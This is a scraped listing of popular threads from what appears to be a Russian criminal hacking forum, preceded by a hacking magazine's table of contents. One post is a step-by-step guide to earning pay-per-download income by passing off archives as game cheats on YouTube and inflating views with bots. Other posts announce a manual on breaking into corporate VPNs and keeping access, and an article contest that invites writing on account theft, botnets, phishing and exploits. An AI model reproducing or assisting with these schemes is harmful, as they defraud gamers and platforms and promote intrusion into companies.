Количество страниц: 130
Качество: хорошее
Размер файла: ~15 Мб
Язык: русский**

Содержание:
FERRUM
Смотри в оба: сравнительное тестирование веб-камер

PC_ZONE
Windows, эпизод 7: Новая Виста
Строим RIA-приложение
SDL, или безопасность по Microsoft
Эксперименты с навигатором: прокачиваем обычный GPS-навигатор

ВЗЛОМ
Easy Hack
Обзор эксплойтов
Атака на QIP
В сетях соцсетей
Охота на скринсейверы
Классовая борьба: обзор уязвимостей в популярных PHP-классах
Энциклопедия антиотладочных приемов
Х-Tools

СЦЕНА
Такие разные лики Сети
X-Stuff

ЮНИКСОЙД
Пингвин дальнего плавания: методики продления жизни ноутбука
Приручение бесстрашного козерога: Ubuntu 8.10 и KUbuntu 8.10
Tips'n'tricks из арсенала юниксоида

КОДИНГ
В интернет по-профессиональному
Карты, деньги, компилятор: пишем крутой бот для игры в интернет-покер
Твердокаменный AJAX
Трюки от Крыса

ФРИКИНГ
Тайна третьей планеты
Киловольты на мегагерцы

SYN/ACK
Самосборные окна: WAIK
Каждому по заплатке: поднимаем сервер обновлений на базе Win2k8 и WSUS 3.0 SP1
Шаманство над виланами
LiveCD: мощное оружие профи: обзор живых дистрибутивов Linux

ЮНИТЫ
PSYCHO: Ловушки нашего мозга
FAQ United
Диско
Подписка
X-Puzzle
WWW2

"Жди меня". Ищу. Поиск пропавших людей

Author: KNOWNAME • 2020-02-09T14:52:16+0000 • Replies: 264 • Views: 77K
**Общая тема для поиска пропавших людей (без претензий)
// Модератор**


У кого-нибудь есть связь с Paramedic?
Человек не выходит на связь около 4 дней.
Слышал, что людей как-то связанных с ним взяли.

P.s. Никаких финансовых притензий к нему не имею. Волнуюсь за него, были очень
тесно знакомы, всегда предупреждал о подобных пропажах.

Литература. Коллекция книг.

Author: Winux • 2005-01-20T22:35:44+0000 • Replies: 148 • Views: 77K
Вот решил открыть этот топ так как наткнулся на очень интересный сайт
<http://www.wisesoft.ru/>
Тут полно разных журналов для чтения в оффлайне и не только про компы.
Сливаем.... :excl: :excl: :excl:
Вот еще подборка литературы от анонимусов:
<http://www.anonymous.ru/books/pafiledb.php> :excl: :excl: :excl:

Выкладываем еще линки
![:D](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)

URL's. Интересные ссылки. Полезненькое.

Author: Ar3s • 2013-06-25T11:48:55+0000 • Replies: 169 • Views: 74K
Что бы не делать репостов предлагаю в этом топе скидывать ссылки с кратким
описание что по ней лежит.
Ссылки должны быть интересными и познавательными и относиться тематически к
теме форума.

Пожалуй начну:

[Могут ли компании снова доверять Microsoft? Спецслужбы получали информацию о
0-day уязвимостях Windows и Skype](http://habrahabr.ru/post/184014/)

[Google был вынужден передать властям США переписку двух волонтёров
Wikileaks](http://habrahabr.ru/post/184354/)

[Первый случай конфискации биткоинов](http://habrahabr.ru/post/184390/)

Заработок на файлообменнике от 300р в день

Author: lizun • 2018-10-23T21:21:24+0000 • Replies: 239 • Views: 63K
**Здравствуйте, сегодня я вам расскажу, как
зарабатывать на файлообменнике до 1800$ за 1000
уникальных скачиваний.
Во-первых я вас познакомлю с сайтом pinapfile.
Ссылка для регистрации: ****<https://pinapfile>. c**om?rf=3354 **реф(с бонусом
к первым 100 скачиваний) - помогу советом,по любому вопросу в телеграм -
[@lizunovai](https://telegram.me/lizunovai)
pinapfile. com - не реф
Для более нормального заработка нам
понадобится зарубежный трафик. Т.к данный сайт
платит в среднем за одно уникальной скачивание из
США около 1.2$. Ниже на скриншоте цены указаны
более подробно:
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F2f55a9ab3747fb47387ef92e6b6272d1.png&hash=018bd22778c175918b3c1f08fda40294)
Итак, теперь я вам расскажу про регистрацию и
настройку на данном сайте:


1.Регистрируемся на данном сайте.[тык](https://*************?rf=3354)
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2Fdcb5c0658fa60547e19f20e1cbd409f8.png&hash=1dbadd9a5194d87e0c9fa25b099d54d3)
Для этого нажимаем на Sign up. И далее пишем
свою почту и имя. И нажимаем Sign Up for Free.
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F845fd5cc274942eacdb4ec100a635e5b.png&hash=acf815b6d9f44703afac7f6e0aece55c)
После данных действий, вам на почту придет
сообщение с подтверждением. В котором будет
находится пароль от аккаунта.
ВАЖНО: Ha @Mail.ru НЕ ПРИДЕТ,ИСПОЛЬЗУЙТЕ @Gmail.com или
[Yandex](/members/180/) (ОБЯЗАТЕЛЬНО ПРОВЕРЯЕМ ПАПКУ СПАМ).
Поздравляю вы зарегистрировались!
Теперь переходим к следующему этапу:

2\. Заходим на аккаунт и переходим в вкладку Files
(Файлы).
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F4ff86a2129d0e41fdbf0a5c7d048d76e.png&hash=2896dcfae3a2c3fb9953fa7942281c91)
Здесь мы будем добавлять любой файл
(желательно архив. Переименовываем свой архив)
например Private Hack v3.5).
Вот [ФАЙЛ](https://yadi.sk/d/8vL8YzO02z-dXA) можете переделать его под себя,и
под свою игру.
(Называем файл так, потому что мы будем заливать
видео на youtube с читами для популярных игр и с
нашей ссылкой. Youtube это бесплатный зарубежный
траффик, а читы на игры всегда популярны в
поисковых запросах. Далее поговорим об этом
подробней.)
После данных действия появляется файл
Нажимаем на синюю кнопку.
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2Fd83ecdb25ad5a6c8aa4db6b790b99007.png&hash=cd78187424131e2d63a0a0ce7361cb4c)
И копируем ссылку на
наш файл.
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F1cfadca2a8ef00464fd2dcd12307fe3c.png&hash=6186f446b92ddb9998267928ecf6d6e0)

Советую данную ссылку сократить, есть множество
сайтов для сокращения ссылок -
один из самых популярных
<https://bitly.com>
если будете его использовать,советую зарегистрироваться что бы отслеживать
сколько раз кликнули по вашей ссылке
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2Fc0bffedf6f0b83b01a0dd245e7175fd1.png&hash=fae4933c4e41f3322ba86e7983cfbebe)
Итак файл мы залили, теперь будем распространять.

3.Распространение файла на youtube.
Нам понадобится аккаунт google с youtube каналом.
Его лучше всего купить с хоть каким - то
активом(подписчики,просмотры,лайки),так же можно зарегистрировать самому. А у
большинства он есть.
Файл будем распространять как чит на популярные
игры такие как - PUBG,ROBLOX,UNTURNED.(игры можно подбирать самому,даже
нужно,т.к. чем больше видео с "читами" залить с различными играми - профита
будет больше)
Заходим на youtube и вводим в поиске PUBG hack
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2Fefe02af7ae6b36141fb4028bf9dd3f60.png&hash=1be951e0701fdba7b4c04dffecfab8ae)
Ищем видео, где будет геймплей с читом под музыку на вашу игру(советую брать
видео до 7 мин,без голоса).
Скачиваем любое из данных видео (можно
воспользоваться сайтом <https://ru.savefrom.net>)
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2Fec88804cf82d5a85ee3cf6bc694692a3.png&hash=d180bcb453021e9994d31d833daf8e06)

Теперь заливаем данное видео на свой youtube
канал.
Если ютуб не пускает видео по любой из ошибок(как пример)
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F1313c8e7d0a7cefc812f7194f7670d88.png&hash=b5589b1bdc9dc2f689d4c88732011bd9)
делаем любое редактирование видео,обрезку на 1-2 секунды,добавляем свою музыку
сверху,вотемарк свой.
Обрезать можно в windows 10 в обычном редакторе
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F7f08e4864f00b37481e777582132a113.png&hash=7aaea641e71b0dcc4119b94411a3004b)
или же сделать интро к каналу(сервисов море,гуглим) и вставлять в каждый ролик
- это вызывает больше доверия у того кто просматривает ваш ролик
сервис по объединению(не только) видео - <https://mergevideo.online/ru>
Название можно чуть отредактировать с видео, которое скачали.После этого ищете
красивое описаниве под каждый ролик(как пример могу так же дать в телеграмме -
[@lizunovai](https://telegram.me/lizunovai)) И не забудьте в описании добавить
ссылку
на свой фаил.
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F36e4e872ddd5e6ee4b16464f48e3c4d7.png&hash=29dafee09b2674d7bcd10f954c6301c6)
Можете воспользоваться сервисом по скачиванию превью с видео -
<https://alexbruni.ru/youtube2images/> (не реклама)
Важный момент - теги к видео,где их брать?
Как вариант тут - <https://keywordtool.io/> (не реклама) - не лучший
вариант,так как занимает тонну времени,но все же.
Лучший из вариантов,если собираетесь долго работать по этой схеме,он вам
ооочень и очень хелпанет -
[тык](https://chrome.google.com/webstore/detail/vidiq-vision-for-
youtube/pachckjkecffpdphbpmfolblodfkgbhl?hl=ru) (не реклама) - позволяет
сгенерировать актуальное название под то видео которое вам нужно + актуальные
теги.
И 3 вариант - <https://alexbruni.ru/youtube-tags/> (не реклама) - берем
топовый ролик по вышей игрухе,вбиваем его сюда и этот сервис показывает какие
теги юзал автор видео.
ВАЖНО - что бы профит был в первые 3 дня,советую взять накрутку на видео.
(например1-2к просмотров и 50+ лайков) или другие способы распространения
зависит от вашей фантазии, всё это позволит вывести ваши видео в топ по поиску
и в рекомендации.
Специально для хороших людей,один мой хороший знакомый сливает для вас
"АВТОКЛИКЕР" для YTmonster.ru - [АВТОКЛИКЕР(яндекс
диск)](https://yadi.sk/d/Ute4iu2BiAFfPQ)
[АВТОКЛИКЕР(rghost)](http://rgho.st/85N6jtVYw)(сервис по накрутке
просмотров,лайков,подписчиков на ютубе)
Как работает кликер,запускаете кликер,заходите на
[-сайт](https://ytmonster.ru/?r=291834)**


* **

* Выполнить задание
* запускаете кликер
**

**-выбираете каждые координаты(У всех они разные,не нужно ставить такие как на
скринах)
Нажимаете на 'X,Y" после этого наводите на нужную координату(все обозначено
стрелками и галочками по каждому цвету) и жмете CTRL, координата
зафиксирована,и так с каждой из них.
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F394ebcbd759aefd379d4d6d079ba4917.png&hash=204795c34f6ccb1b91dbcd609791c74b)
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F9bb18ffedb1c5544050d34038331d33c.png&hash=5cc7429645ef267c1c384fe7f37f0dd5)
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2F40107af280960e735fff27d76d031b62.png&hash=720cdb3447d4d78e963818d5a25bdd74)
\- в кликере выбираете "Время ожидания в задании" \- 30 сек(ВАЖНО!!!)
-жмет старт,курим сиги,пьем чай, пока работает кликер и фармит вам баланс
[автокликер](https://yadi.sk/d/Ute4iu2BiAFfPQ)
Или же получше(но платные) сервисы для накрутки
просмотров,лайков,подписчиков,репостов и тд..
Лучший сервис по накрутке просмтров,быстро и качественно,крутит время
просмотра 70%+ - [тык](http://prskill.ru/?ref=20606) \- не реклама
тоже не плохой сервис,правда бывает крутит просмотры долго -
[тык](https://ouin.ru/login.php?referr=413750) \- не реклама
Пробуйте разные игры CS PUBG DOTA2 и т.д(по мере возможностей буду пополнять в
теме актуальные игры)
Советую заливать видео вечером или ночью. Т.к в Америке другой часовой пояс.
И конечно же пруфы:
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2Fb58d8ec19f5d20468bc2746afb2f2629.png&hash=6f19e3b07593991c2e4332f5bbd9815c)
Киви
![](/proxy.php?image=https%3A%2F%2Fi.gyazo.com%2Fd098026564d9c92a4ccd1a9f5bada722.png&hash=847ab7ab7a0430d6b041245f5f3dac5b)
И так далее.
Ссылка для регистрации: ******<https://pinapfile>. c**om?rf=3354 **реф(с
бонусом к первым 100 скачиваний)** \- помогу советом,по любому вопросу в
телеграм - [@lizunovai](https://telegram.me/lizunovai)
pinapfile. com - не реф**

Ман по работе с сетями версия 2.0 (2023) Обсуждение!

Author: National Hazard Agency • 2022-12-06T02:03:48+0000 • Replies: 234 • Views: 62K
![1670291153402.png](https://xss.is/attachments/47429/)

Уф аш по ляхам холодок пробежал

В первой части была инфа по работе а в этой будет инфа по нагибу любых впнов
без 0дей и прочей херни. + будут примеры защит некоторых контор которые мне
показались забавными. Вы будете удивлены на сколько слабо конторы защищают
свои доступы от таких как мы. + я пока сомневаюсь стоит ли клеить в ман
лютейшие документы одной компании в качестве примера (но если я их приклею это
минимум 6 звезд для меня по уровню розыска =D) .
Более подробно рассмотрим тему быстрого проникновения в корпу и закрепе в
конторе на впн по громкому даже если нас палят. Поговорим о том как вернуть
утраченный доступ если контора закроет лазейку.
**
Готов выслушать ваши предлы что стоит включить и какую темку подробнее
раскрыть. Будет интересно почитать ваши комменты.**
Первая тема будет добыча материала за, что меня будут все ненавидеть так как
это в большинстве своем убьет логи продажники и спам по конторам тупо из-за не
надобности и нецелесообразности подготовительных мероприятий.

Коронавирус Covid-19

Author: top • 2020-02-11T19:38:23+0000 • Replies: 342 • Views: 60K
Кто что думает?
глобальный катаклизм мирового масштаба? катастрофа? или американцы запустили и
решили притравить китайцев изнутри? как-то подозрительно с гневными речами
трампа совпало.
финрынки уже отреагировали, все начало шибко валится, и это только начало.
даже будет больше
убытки Китая прогнозируются на уровне триллионов долларов. и опять же, только
начало, это потащит другие страны по цепочке

Конкурс #0. ][ak квест #2021

Author: Quake3 • 2021-01-13T14:59:34+0000 • Replies: 525 • Views: 59K
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FYjL9wwF%2Fquest-
logo.png&hash=78142e30f93b9ab8341a743b3c592d2f)​


**Внимание, ахтунг, варнинг!**
Это свершилось! Мы представляем вам то, чего не было вот уже много-много лет.
То, за чем соскучились старики и в глаза не видели новички. В ближайшее время
на нашем форуме стартует квест.


**][ak квест #2021**

**Описание:** Настоящий, старый, олдскульный хакерский квест. Это не CTF,
здесь нет турнирных таблиц, а просто присутствует старая добрая дружеская
андерграунд атмосфера. Надеюсь, вам будет интересно.

**Цель квеста:** найти финальный ключ.

**Как играть?**
В начале квеста вам дается входящее значение, доступное по кнопке "старт"
ниже. Беря его, вы проходите дальше по шагам.
Прохождение происходит линейно, т.е. по шагам, без прохождения предыдущего
шага, нельзя пройти следующий.
Для старта вам нужно будет написать в данной теме "**START XSS QUEST** ", без
уведомления о старте финальный результат не будет засчитан.
В случае успешного прохождения квеста, вы должны написать в этой теме "**Я
прошел XSS QUEST** " и отправить мне [в ЛС](https://xss.is/members/12179/)
полное описание прохождения квеста. По шагам. Детально. Без этого, ваша победа
не засчитывается.
Победят первые 3 человека, прошедшие квест. Кто первый - тот и выиграл. После
успешного прохождения 3го человека квест продолжается, но проходите вы уже без
$ призов.

**Сложность:** 6/10

**Правила:**
Участвовать могут все.
Публично обсуждать задания запрещено! Только я могу давать подсказки.
Можно и НУЖНО делиться в этой теме впечатлениями, мнениями, писать, кто
застрял на каком этапе. Активничать и технически тролить остальных. Но без
обсуждения заданий и их прохождения!
Если задания окажутся слишком сложными, я дам здесь в теме публичную подсказку
Прохождение тимами запрещено.
Проверка прохождения будет осуществляться в полном объеме. Это и есть защита
от читерства.
Не нужно ддосить, пакостить, хекать и читерить сервер / квест. В таком случае,
я приостанавливаю игру.

**Призы:**
1 место - **500$**
2 место - **200$**
3 место - **100$**

**Начало квеста**
17.01.2021

**Начать:** <https://pastebin.com/0fLiCXqZ>

Удачи всем!

КОНКУРС на 500$: Лого для форума xss.is

Author: admin • 2018-10-22T16:45:06+0000 • Replies: 218 • Views: 57K
КОНКУРС: Лого для форума xss.is

Думаю, описание городить не нужно.

Лучше несколько вариантов.

Выигрывает 1 лого.

Приз **500$**

Окончание конкурса **11 ноября** , после будет создан топ с голосованием.
Окончательное решение за админом.

Дополню: лого будет установлено на месте текущего логотипо-текста:
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2FnxwjyEI.png&hash=9610e54a83c224efb55093259f2f4e19)

Это должен быть классный, запоминающийся, продуманный и выразительный логотип.
Чтобы раз увидеть и навсегда запомнить наш форум. Средний по размерам
(большой-не нужен, простыня, маленький-смотрится невыразительно). Подходящий
под текущий дизайн страницы.

Как и сказал SUB_ID, все конкурсные варианты будут выложены на голосование. И
победит тот, кто наберет большинство голосов.

Срок жизни Windows

Author: OLEG • 2005-07-16T06:11:11+0000 • Replies: 140 • Views: 49K
Сколько времени живёт ваша винда без переустановки

Чем вы занимаетесь?

Author: Одинокий Волк • 2009-02-22T15:28:52+0000 • Replies: 55 • Views: 48K
На варианты ответов не обращайте внимание, не нужно вчитываться и понять чем
отличается какой либо пункт, выбирайте то, что попадается вам в глаза. Это
своего рода психологический тест
![:\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)

Позже дополню в зависимости от ответов.

[mod][DeusTirael:] Добавил "спам"[/mod]

Uinomania 4.0

Author: SM@x • 2005-02-06T10:40:56+0000 • Replies: 130 • Views: 48K
**UINomania 4.0** ​



_Квест by SM@x_ ​


Итак, _задание_ :
"Первый кто запостит правильный ответ, а именно где и когда родился _uinoman_
\- получит приз!"

Сегодня приз состоит из 4х уинов:
125643
157940
948741
576174

причем, уин 157940 - получит тот, кто первым пройдет 5 левелов и успеет
сменить на нем пассы!

Внимание: в квесте не использовались исполняемые файлы (e.g. “*.exe”, “*.bat”
etc.)


[Level 1](http://winux.net.ru/uinomania4/)​

Партия "Красные хацкеры" и вступление в нее

Author: Winux • 2006-08-18T09:49:26+0000 • Replies: 166 • Views: 47K
**Внимание, дорогие товарищи!** ​



![](/proxy.php?image=http%3A%2F%2Fxss.is%2Ffiles%2Frh%2FRH_logo.gif&hash=54d13d098ea6c929647d3b159373bcc4)​

Рад сообщить Вам что сегодня начала свою деятельность новая партия - "Красные
хацкеры".
В нашу молодежную партию вступить могут все кому не лень.
Для того чтобы вступить в нашу партию Вам необходимо разместить в подписи на
всех форумах вот этот маяк:


[![](/proxy.php?image=http%3A%2F%2Fxss.is%2Ffiles%2Frh%2Frh.gif&hash=8e42e36588f8f2f47e6375cc9ff8a16b)](https://xss.is/threads/10635/)​

Со ссылкой на эту тему.

Код для форумов с BB-тегами:
`[URL=https://xss.is/threads/10635/][IMG]http://xss.is/files/rh/rh.gif[/IMG][/URL]`

Вступайте, дорогие друзья!
Цели партии: Совершить революцию
Методы: Онанизм на некачественное порно
Политическая программа: победить всех!

Да здравствует Че Гевара! Вива Фидель! Ура, Ленин!

КОНКУРС СТАТЕЙ. Призовой фонд - 1.000$

Author: admin • 2018-11-23T16:39:05+0000 • Replies: 121 • Views: 44K
**Как и обещал, продолжаем серию конкурсов. Теперь, встречайте,******КОНКУРС
СТАТЕЙ.****


![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2Feafrx3u.png&hash=25b8e6ca403671ee08d70df81f4c0f6e)
.....................................
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2F1LWa7KG.png&hash=8201decff8d4a79abfa87f340868bc96)​


\----------
**Конкурс на лучшие статьи. Принимаемые направления (тематики):**

* Взломы (web, *nix). Любые. Методы заливки шеллов, повышения прав. Ваши истории и приемы. Интересные истории взломов.
* Нестандартные способы добычи материала: админок, шеллов, рутов, баз, соксов, ssh, дедиков и т.д.
* Программирование в хакинге: написание брутеров, парсеров, чекеров, спамеров, флудеров и т.д.
* Хакерство в гейминге. Методы, схемы добычи игровых вещей. Воровство steam/прочих акков. Интересные истории.
* Трафик: методы добычи, работа с биржами.
* Malware и вирусы. Ботнеты. Разработка ботов. Эксплуатация и монетизация.
* СИ и фишинг на практике (системы фишинга, точечные заражения).
* "Беспроводной" взлом. Взлом wi-fi, bluetooth, перехват и сниф траффика.
* Поиск 0day и 1day уязвимостей. Разработка эксплойтов к ним.
* Антидетекты и безопасность. Работа с антидетектами. Фингерпринты, отпечатки операционок. Методы скрытия.
* Скрытый интернет. Альтернативные DNS. Криптодомены (.bit, .lib, .coin, .neo и т.д.). Все о TOR. I2P. Развертывание систем. Прокидка софта, траффика и т.д.
* ДРУГОЕ, ВАША ТЕМА (ЛЮБАЯ)


**Правила**
1\. К участию допускаются все участники, без ограничения по дате регистрации и
количеству постов.
2\. Чтобы статья попала к участию в конкурсе, необходимо разместить ее в
тематическом разделе форума.
3\. Ссылку на написанную статью нужно будет разместить в этой теме.
4\. Будут учтены только статьи, ссылки на которые были опубликованы в этом
топе.
5\. Количество статей от одного участника - не более 3х.

**Требования к статье:**

* Статья - только авторская. Копипаст = выдворение из конкурса, с позором.
* Размещение статьи - только у нас на XSS.is
* Минимальное количество символов - 7000. Пару абзацев - это не статья.
* Хотелось бы видеть теорию, интересные примеры из жизни, интересные истории, подкрепленные теорией и практикой. Не стоит копипастить официальные мануалы или писать бездумную теорию, она никому не интересна.
* Нормальное оформление. Орфография - прогоните через MS Word. Имейте уважение к участникам



**Выбор победителя:**
Администратор (т.е. я) собирает статьи из этой темы. Провожу первичный отбор.
Ерунду, копипаст и то, что я посчитал неинтересным, снимаю с конкурса сразу,
при первичном отборе. Но не переживайте, все нормальные статьи будут
обязательно выставлены на голосование. Голосование будет доступно только
участникам, зарегистрированным до начала конкурса. Поэтому не тратьте время на
регистрацию мультов и прочие махинации. Лучше напишите крутую статью
![;\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)

Прием статей начинается **25.11.2018** и заканчивается **25.12.2018** в 00:01.
Подведение итогов начинается **27.12.2018**.

**Победитель конкурса (1 место) получает приз - 500$
2 место - 300$
3 место - 100$
4 место - 50$
5 место - 50$**

Всем удачи!

Конкурс на шестизнак.

Author: Ushiro • 2005-12-19T19:47:38+0000 • Replies: 141 • Views: 44K
Много ума не надо. Вместо звездочки * вставляем символ(это может быть
прописная или заглавняа буква, символ или цифра)

302974;Y*3UP*w5

346871;P*pGY*hI

позже будут еще номера. Брутим, отписываемся...

ГОЛОСОВАНИЕ: Выбираем логотип для нашего форума!

Author: admin • 2018-11-12T23:05:09+0000 • Replies: 194 • Views: 43K
Добрый день, друзья!
Как и обещал, выбираем логотип форума, путем демократического и честного
голосования =)

**Правила:**

**1.** Собраны все работы, представленные в теме
<https://xss.is/threads/26355/>

**2.** Из общего голосования убраны дублирующиеся варианты от одного и того же
участника (например, с "http" и без него; с анимацией и "без"). Фильтровал на
свое усмотрение. Считайте это первичной фильтрацией. Все добавить к
голосованию физически не получается, это увеличит кол-во вариантов в х3-х4
раз. И просто заспамит голосовалку, будет 5 листов вариантов - выбрать
понравившийся нереально.

**3.** Голосование будет длиться 7 дней. То есть **до 18.11.2018 23:59**

**4.** На время голосования закрыта регистрация на форуме! Цель:
минимизировать риски и варианты набива голосов мультами.

**5.** В случае обнаружения манипуляций, вы снимаетесь с голосования.

**6.** Оставляю за собой право в любой момент прекратить голосование. Или же
снять любую работу, в любой момент времени. Специально делать я этого не буду,
не в этом была суть конкурса (цель - выбор "народного" лого, понравившегося не
только мне, но и большинству). Но! на случай ЧП, такое право за собой оставляю
(например, если буду видеть, что побеждает слабый вариант, набитый
друзьями/знакомыми).

**7.** Большинство вариантов были представлены в рандомном стиле (на фоне-без
фона, с анимацией-без анимации и т.д.) Мы специально не выдвигали никаких
требований и не ставили ТЗ/задачи, чтобы предложить свой вариант мог буквально
каждый. И предложить именно так, как видит он.
а) поэтому в результатах голосования все работы представлены "as is". Но
выбирал, если было, среди ваших выложенных вариантов на фоне. Без него -
просто не оценишь вообще.
б) от победителя нужен будет: логотип определенного формата, веса, в
нескольких размерах, на прозрачном фоне, favicon (ясное дело, производная от
логотипа). Т.е. победившую работу (концепт) нужно будет еще довести до
нормального состояния, пригодного для установки на сайт. Я - не дизайнер,
поэтому нужна будет ваша, победитель, помощь с этим.
в) приз вы получите именно после выполнения п.7б.

**8.** Конкурс организовал и предоставил приз . Спасибо большое, SUB_ID, это
было очень интересно, креативно, благодаря тебе мы смогли собрать море
классных логотипов.

**9.** Результаты опроса открыты. Каждый сможет увидеть результаты. Также
разрешено менять голос. Результат может быть только 1.


**Голосующим!**
Ребята, голосуем! Вариантов вышло много (77 штук). Но мы должны выбрать
всенародное классное лого для нашего форума. Как голосовать? Открываете
спойлер ниже, увидите 77 пронумерованных вариантов. **Внимательно** листаете
все, выбираете понравившийся, отмечаете в голосовалке - ваш выбранный вариант.
Не ленитесь просмотреть и полистить до конца. Много крутых работ и в начале, и
в конце.
Заранее спасибо
![;\)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)




Spoiler: Варианты логотипов, МНОГО изображений

1\. Логотип от [BabaDook](/members/173639/)
![](/proxy.php?image=https%3A%2F%2Fd.radikal.ru%2Fd26%2F1810%2Fde%2F675b933d6bc3.png&hash=d4b187447e472181d4e7fd51260b683f)



2\. Логотип от [m0nr](/members/174455/)
![](https://xss.is/attachments/1708/)



3\. Логотип от [fugoxxx](/members/174461/)
![](https://xss.is/attachments/1709/)



4\. Логотип от [SATANIA](/members/174480/)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2FhaQnSse.gif&hash=1030c3b3fe47a466c4ffc579fb5b9e0d)



5\. Логотип от [Mongar](/members/174484/)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2Fuie8YQg.png&hash=3ab59319af118a7cef5740f7dc260659)



6\. Логотип от [S4mpl3x](/members/174493/)
![](/proxy.php?image=https%3A%2F%2Fpp.userapi.com%2Fc845323%2Fv845323780%2F11eb51%2FfWKtOK8hewI.jpg&hash=909214983fb8a23a1edfd8543b875e5e)



7\. Логотип от [UNeed2Stop](/members/174495/)
![](https://xss.is/data/attachments/1/1683-87f578e2f392d52985bba87fdcfcc71a.jpg)



8\. Логотип от [JunndeBoom](/members/174500/)
![](https://xss.is/data/attachments/1/1686-74fbec28c05a28bd61ebb4508d66dfa1.jpg)



9\. Логотип от [ad1sjkee](/members/174501/)
![](https://xss.is/attachments/1720/)



10\. Логотип от [verzion21](/members/174510/)
![](https://xss.is/attachments/1730/)



11\. Логотип от [S4mpl3x](/members/174493/)
![](/proxy.php?image=https%3A%2F%2Fsun9-9.userapi.com%2Fc831408%2Fv831408091%2F1b3bab%2FfaxVslsgI-c.jpg&hash=4607f0bbafd3eb28a9ea3e95350ff366)



12\. Логотип от [UNeed2Stop](/members/174495/)
![](https://xss.is/data/attachments/1/1700-c2e48ebbb6fca639d309d0b1994abe5c.jpg)



13\. Логотип от [Aldesa](/members/174130/)
![](https://xss.is/attachments/1742/)



14\. Логотип от [BabaDook](/members/173639/) / devton
![](https://xss.is/attachments/1744/)



15\. Логотип от [Sectunt](/members/174515/)
![](https://xss.is/attachments/1750/)



16\. Логотип от [Slowy](/members/174479/)
![](https://xss.is/attachments/1752/)



17\. Логотип от [Atlas](/members/174516/)
![](https://xss.is/attachments/1756/)



18\. Логотип от [DE](/members/1748/)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2F6LMyYYu.png&hash=4a453de5f532725c58bbb5194c84b60d)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2FC21au7q.png&hash=642bc709b60f2fd17170bec29dfaa137)



19\. Логотип от [Slowy](/members/174479/)
![](https://xss.is/data/attachments/1/1729-77fc1101ac8560aa032026395d035362.jpg)



20\. Логотип от [HIDEK1LLER](/members/174526/)
![](https://xss.is/attachments/1769/)



21\. Логотип от [adamrnj](/members/174486/)
![](https://xss.is/attachments/1777/)



22\. Логотип от [whiteydark](/members/174561/)
![](https://xss.is/attachments/1789/)



23\. Логотип от [Ace](/members/174520/)
![](https://xss.is/attachments/1792/)
![](https://xss.is/attachments/1794/)



24\. Логотип от [Murka](/members/174564/)
![](https://xss.is/attachments/1965/)



25\. Логотип от [Evgeny112](/members/174575/)
![](https://xss.is/attachments/1798/)



26\. Логотип от [sizzeR](/members/174588/)
![](https://xss.is/attachments/1807/)



27\. Логотип от [pom4ek](/members/174592/)
![](https://xss.is/attachments/1809/)



28\. Логотип от [whoamii](/members/174593/)
![](https://xss.is/attachments/1810/)



29\. Логотип от [confused](/members/174595/)
![](https://xss.is/attachments/1817/)



30\. Логотип от [Hardown](/members/174597/)
![](https://xss.is/attachments/1814/)



31\. Логотип от [Ar3s](/members/33/)
![](/proxy.php?image=https%3A%2F%2Fdlab.im%2Flogo%2Flogo1.png&hash=6b85837e8e087db50f6ebfb5eec00e72)



32\. Логотип от [Ar3s](/members/33/)
![](/proxy.php?image=https%3A%2F%2Fdlab.im%2Flogo%2Flogo2.png&hash=33ee61b3e246a36aee52ae5c278fdac4)



33\. Логотип от [Ar3s](/members/33/)
![](/proxy.php?image=https%3A%2F%2Fdlab.im%2Flogo%2Flogo4.png&hash=5cae671711e3e25951cf33d6475570e9)



34\. Логотип от [ФиОлЕтОвО](/members/174614/)
![](https://xss.is/attachments/1819/)


35\. Логотип от [ahmeddz](/members/174615/)
![](https://xss.is/attachments/1820/)



36\. Логотип от [ZicK](/members/174622/)
![](https://xss.is/attachments/1823/)



37\. Логотип от [iWashington](/members/174620/)
![](https://xss.is/attachments/1829/)



38\. Логотип от [Duvewo](/members/174624/)
![](https://xss.is/attachments/1832/)



39\. Логотип от [Marchelosss](/members/174539/)
![](https://xss.is/attachments/2017/)



40\. Логотип от [Kosn3x](/members/174639/)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2FbadvG3R.jpg&hash=44ec95d8dd1efcf1aeedc84baed23999)



41\. Логотип от [eternit88](/members/174641/)
![](/proxy.php?image=https%3A%2F%2Fi.imgur.com%2Fr2JBFS9.png&hash=f3009d0f74e3a5a3d36c84c3c680d30e)



42\. Логотип от [vazzi](/members/174648/)
![](https://xss.is/attachments/1856/)



43\. Логотип от [Restl](/members/174655/)
![](https://xss.is/attachments/1864/)



44\. Логотип от [Deiter](/members/174665/)
![](https://xss.is/attachments/1866/)



45\. Логотип от [sunshy](/members/174680/)
![](https://xss.is/attachments/1875/)



